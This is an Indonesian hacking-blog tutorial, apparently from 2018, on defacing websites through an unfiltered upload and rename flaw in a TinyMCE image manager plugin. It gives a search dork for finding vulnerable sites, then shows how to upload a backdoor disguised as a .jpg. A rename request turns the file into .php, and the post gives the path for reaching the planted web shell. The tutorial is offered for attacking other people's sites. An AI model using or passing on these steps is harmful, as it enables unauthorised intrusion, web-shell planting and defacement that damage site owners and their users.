Tutorial Deface Metode Tiny MCE Image Manager - Jakarta BlackHat
BLANTERWISDOM101

Tutorial Deface Metode Tiny MCE Image Manager

Sunday, December 23, 2018


Tiny MCE Image Manager memiliki bug yang sangat fatal , kenapa ? karena attacker bisa mengunggah dan merename file  , kok bisa sih ? mungkin karena tidak di filter jadi attacker bisa sesuka hati mengunggah dan merename berbagai file .

ALAT PERANG :

1. Backdoor
2. Otak Hentai
3. PC / Android
4. Internet ( ya kali gk pake )

STEP BY STEP :

Dork :
            inurl :/tinymce/plugins/image/image.php

1. Dorking terlebih dahulu lalu pilih salah satu site  ciri-ciri VULN ?  adanya form upload file  :




2. Upload backdoormu jangan lupa exstensinya .jpg lalu masukan exploit berikut untuk merename backdoor :

exploit : /rename_file.php?current_name=backdoor.jpg&new_name=backdoor.php

contoh : https://site.com/tinymce/plugins/image/rename_file.php?current_name=backdoor.jpg&new_name=backdoor.php





( picture ketika berhasil rename backdoor )

3. Akses backdoornya gimana min ?

contoh :  site.com/tinymce/plugins/image/uploads/backdoor.php




Gimana easy bukan ? masih bingung , skuy kolom komentar tersedia . Gimana liburan akhir tahunnya ? mau di temenin sama admin gk :3 , tapi khusus cewe iya :'v .
Share This :

1 Comments

Subscribe New Articles

Subscribe to Our Newsletter for Get Quality Updates on Your Email. It's Free!